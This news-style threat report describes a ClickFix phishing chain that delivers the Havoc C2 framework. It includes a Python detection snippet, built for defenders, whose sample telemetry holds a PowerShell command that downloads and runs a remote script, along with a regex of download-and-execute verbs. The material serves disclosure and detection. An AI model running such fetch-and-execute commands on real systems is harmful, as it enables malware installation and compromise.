A new phishing campaign utilizing the ClickFix technique to deploy the Havoc command-and-control framework has been identified by cybersecurity researchers. This campaign begins with a phishing email containing an HTML attachment labeled “Documents.html.” Upon opening the file, a fake Microsoft OneDrive error message appears, prompting the user to update the DNS cache manually. This deceptive message is intended to mislead the victim into running a PowerShell command that initiates the infection process.
The PowerShell command in this phishing attack triggers the download of a malicious script from a SharePoint server controlled by the adversary. This script first checks whether it is running in a sandbox environment before proceeding. If the system appears clean, the script downloads the Python interpreter (“pythonw.exe”) if it is not already present and executes a Python script that serves as a shellcode loader for the next, more sophisticated phase of the attack. This phase launches a reflective loader, KaynLdr, which is capable of running an embedded DLL: the Havoc Demon agent.
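As an added, defender-side illustration (not code from the report or from the Havoc project), the following correlates process-creation events to flag the chain described above: a user-launched PowerShell that fetches a script from a SharePoint URL, followed on the same host by a windowless `pythonw.exe` running a script. The event field names, hostnames, URLs, paths and the ten-minute window are all constructed assumptions for this example.

```python
# Added example (not from the report): correlate constructed process-creation
# events to flag the ClickFix -> Havoc chain. Hosts, URLs, paths and thresholds are assumptions.
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

@dataclass
class ProcEvent:
    ts: datetime
    host: str
    parent: str   # parent image name
    image: str    # process image (name or full path)
    cmdline: str

DOWNLOAD_VERB = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|iex)\b", re.I)
SHAREPOINT_URL = re.compile(r"https?://[\w.-]+\.sharepoint\.com/", re.I)
# ClickFix has the victim paste the command themselves (Run dialog or a shell),
# so the PowerShell parent is a user shell, not an Office app or script host.
USER_SHELLS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}

def is_clickfix_powershell(e: ProcEvent) -> bool:
    """Stage 1: user-launched PowerShell that fetches and runs a script from SharePoint."""
    return (e.image.lower().endswith("powershell.exe") and e.parent.lower() in USER_SHELLS
            and bool(SHAREPOINT_URL.search(e.cmdline)) and bool(DOWNLOAD_VERB.search(e.cmdline)))

def is_suspicious_pythonw(e: ProcEvent) -> bool:
    """Stage 2: windowless pythonw.exe outside Program Files running a script (the loader)."""
    img = e.image.lower()
    return img.endswith("pythonw.exe") and not img.startswith(r"c:\program files") and ".py" in e.cmdline.lower()

def correlate(events, window=timedelta(minutes=10)):
    """Return (host, stage1_event, stage2_event) where stage 2 follows stage 1 on one host within the window."""
    hits = []
    for ps in (e for e in events if is_clickfix_powershell(e)):
        for e in events:
            if e.host == ps.host and is_suspicious_pythonw(e) and ps.ts <= e.ts <= ps.ts + window:
                hits.append((ps.host, ps, e))
    return hits

# Constructed sample telemetry: one full chain on WS-17, benign activity on WS-22.
SAMPLE = [
    ProcEvent(datetime(2025, 3, 4, 9, 0, 0), "WS-17", "explorer.exe", "powershell.exe",
              'powershell -w hidden -c "iex (iwr https://contoso-example.sharepoint.com/s/docs/update.txt)"'),
    ProcEvent(datetime(2025, 3, 4, 9, 0, 31), "WS-17", "powershell.exe", r"C:\Users\Public\pythonw.exe",
              r"C:\Users\Public\pythonw.exe C:\Users\Public\loader.py"),
    ProcEvent(datetime(2025, 3, 4, 9, 2, 0), "WS-22", "explorer.exe", "powershell.exe", "powershell -c Get-Date"),
    ProcEvent(datetime(2025, 3, 4, 9, 3, 0), "WS-22", "explorer.exe", r"C:\Program Files\Python312\pythonw.exe",
              r"C:\Program Files\Python312\pythonw.exe app.py"),
]
```

Running `correlate(SAMPLE)` returns a single hit for WS-17 and nothing for WS-22, since a legitimately installed `pythonw.exe` with no preceding SharePoint fetch does not satisfy both stages.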
The Havoc framework employed by the attackers is disseminated through SharePoint sites, with its command-and-control traffic disguised using the Microsoft Graph API. This tactic makes it harder for security tools to detect malicious activity, since the C2 communications blend into legitimate and trusted services. Havoc offers a wide array of capabilities that enable attackers to collect system information, run commands, manipulate files, and carry out advanced attacks such as token manipulation and Kerberos attacks. This makes the framework highly dangerous and effective for maintaining long-term persistence on compromised systems.
The disclosure of this phishing campaign coincides with continuing reports of cybercriminals abusing Google Ads policies to target PayPal customers. Scammers have used fraudulent ads to deceive victims into calling fake customer service numbers, where they are pressured to divulge sensitive personal and financial data. Experts caution that such scams are growing in prevalence, particularly as cybercriminals exploit weaknesses in popular platforms such as Google Ads. This underscores the need to remain vigilant and to implement multiple layers of security to defend against sophisticated cyber threats.